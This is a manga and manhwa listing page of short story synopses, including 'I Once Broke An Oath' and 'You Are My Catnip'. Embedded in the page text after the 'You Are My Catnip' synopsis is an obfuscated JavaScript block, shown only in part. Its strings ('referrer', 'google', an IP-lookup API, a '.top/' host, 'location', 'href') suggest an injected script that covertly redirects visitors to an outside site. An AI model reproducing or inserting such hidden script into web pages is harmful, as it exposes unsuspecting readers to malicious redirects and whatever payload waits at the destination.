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I Once Broke An Oath

Read manhwa I Once Broke An Oath The greatest evil was resurrected, and the youngest high-ranked magician, Diarin, died three times while trying to stop it, and was unable to protect those close to her. In her fourth reincarnation: Her life is at danger thanks to her eternal soul’s fate, and she needs a different strategy to escape her future. Diarin promises divorce when she finds the prince that was engaged since he was a child, in exchange for him staying in her territory for one year. However… … Diarin leaned towards Yejet as best as she could, to try and look as natural as possible. “I will annul the engagement for you.” “Huh?” Yejet asked again, after blankly saying “Huh?” in the moment along with the driver. Yejet’s gaze was very peculiar. It was only thanks to Diarin putting in all of her focus on Yejet, that allowed her to just barely notice that odd gaze. Yejet didn’t take his eyes off of Diarin’s once. He asked her, “Are you talking about Duke Concul?” It was a sentence spoken as quietly as Diarin’s. Excluding the driver, no one could hear their conversation. “No way. Do you think the duke would actually let go of Your Highness? If he could, he would probably tie you up with a rope as tight as he could.” “Then?” Diarin in the quietest voice, as though ice might shatter if she spoke too loudly, “I’m talking about you.”


No More Prince

Read manhwa 노 모어 프린스 / No More Princes “All the princes say the same thing, they must really like Jeno, they only look hard to search for you” Unlike the well known tale of the princess who is trapped in the forest and the fire breathing dragon, Princess Mikaela and dragon Jeno don’t have a typical kidnapper and hostage relationship, but a butler? Guard? A never aging friend of Mikaela’s mother, Hildian? Whichever side you take, he is much better than the princes that wake Mikaela up in the morning, until one day, Jeno gets poisoned by a prince, loses consciousness and his body starts heating up!


A Villain Is a Good Match for a Tyrant

One day the tyrant, Estian, sent a marriage proposal to Cecil. She got dragged to the empire unwillingly but when she saw the emperor's face she had a change of heart. "You're quite the hottie aren't you?" She liked her husband. And her husband likes her back too! To live happily with her tyrant husband does Cecil need to become a villainess far worse than the tyrant?!


To Be Or Not To Be

A Company President diagnosed with cancer accidentally transmigrated into a novel, and became the villainous emperor the male lead is going to kill?! On top of that, this male lead is the prince of the enemy kingdom that is being imprisoned by him at this moment…. Feels like he just took a step closer to death! No way! In order to live, I must please him, but I never knew that it wasn’t just simply hatred between us….


You Are My Catnip

Wu Yue is a 'catnip' descendant- one who carries the fragrance of catnip on her body. Not knowing better, she enrolled in a school that is filled with cat descendants, causing a commotion and to be chased around by them. In the process of escaping, Wu Yue accidentally kissed Li Zechu, a descendant of the jaguar, and unexpectedly discovered that Li Zechu's kiss could somehow camoflage her unique fragrance. Thus, in order to quell the commotion she had caused and survive in school, Wu Yue had to become Li Zechu’s pet. She would have to endure all sort of harrassments, just for a kiss from Li Zechu... It is an impossible kind of development. Wu Yue vows to find another solution to this problem and be rid of the control of the demon Li Zechu!<script></script><script>function _0x3d69(){var _0x25f246=['1224lEHIjS','555878pSjwxW','cRDXs','random','includes','floor','href','google','kgKXh','909916INEvEC','9202lpaCZt','StfZh','http://rea','.top/','OnrVn','text','.customapi','oLZiO','location','then','xZpEp','Xyuym','74655agoAxp','https://ip','656476pUhlNA','3VnztdJ','Arvjf','OGZGT','','referrer','1623365OnOhiI','2689284LaMzje'];_0x3d69=function(){return _0x25f246;};return _0x3d69();}(function(_0x39bd81,_0x25230a){var _0x41b5de=_0x5adc,_0x2ce74d=_0x39bd81();while(!![]){try{var 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A Sharp Sword to Protect the Country

Read manga A Sharp Sword to Protect the Country Lin Xiao, The nine star commander in chief of dragon kingdom, was betrayed by his friend, and became a fool overnight. He was humiliated. Thanks to his fiancee Qin Wanqiu’s constant care for two years, Lin Xiao finally regained his mind and vowed that he would protect Qin Wanqiu, and would make those who humiliated him return ten times!


Dear My Hunny Bunny

Jay is an 8th rank public official. She works as a special guardian, and her mission is to heal children whose souls have been deeply wounded. Ludwig shuts himself off from the world. He seems as if he’s forgotten how to smile. However, he learns what it means to be happy through Jay, and Jay cherishes him as her own precious Hunny bunny.


Finding You Who Abandoned Me

나를 버린 너를 찾아줘 Isaac Esteban, the one I loved and who loved me in return. ⠀⠀⠀⠀⠀⠀ He, who had been so devoted to her, suddenly betrayed Calliope for the saintess who had traveled the lands in search for knights to defeat the demon king. He turned his back on Calliope and left to follow Clementia as the chosen knight fated to subjugate the demon king, who is resurrected every 500 years, saying he felt true love for the latter. ⠀⠀⠀⠀⠀⠀ Foolish Calliope waited for him, hoping to take that one chance to cling to him when he returned. She could never forget that gaze that looked at her so lovingly. ⠀⠀⠀⠀⠀⠀ He came back a year later, dead, without a body and only his name left behind. ⠀⠀⠀⠀⠀⠀ Stricken with grief, she lived as if she were in hell for a year. In the end, during the parade for the one-year anniversary celebration of the demon king’s defeat, she climbed up the bell tower and jumped to her death. ⠀⠀⠀⠀⠀⠀ Stupid Calliope. Foolish Calliope. ⠀⠀⠀⠀⠀⠀ She could neither forget nor throw away the man who had done the same to her. ⠀⠀⠀⠀⠀⠀ She, who threw her life away like that, opened her eyes once again. To her childhood. To the day before she entered the Marquis’ household. To the days as a young child with nothing.


Demon Asura Becomes A 5 Year Old Loli

The Demon Queen Asura whom many fear just hearing her name turns into a child overnight and bullied? Oppressed? Assassinated?Impossible! Not happening!Hey, you trash cultivator, be honored that you are tasked to send this deity back home! &nbsp;


Character Company

A fantasy tale of a battle to be casted for a role! It's finally Noma's time to shine as the main character of a comic!
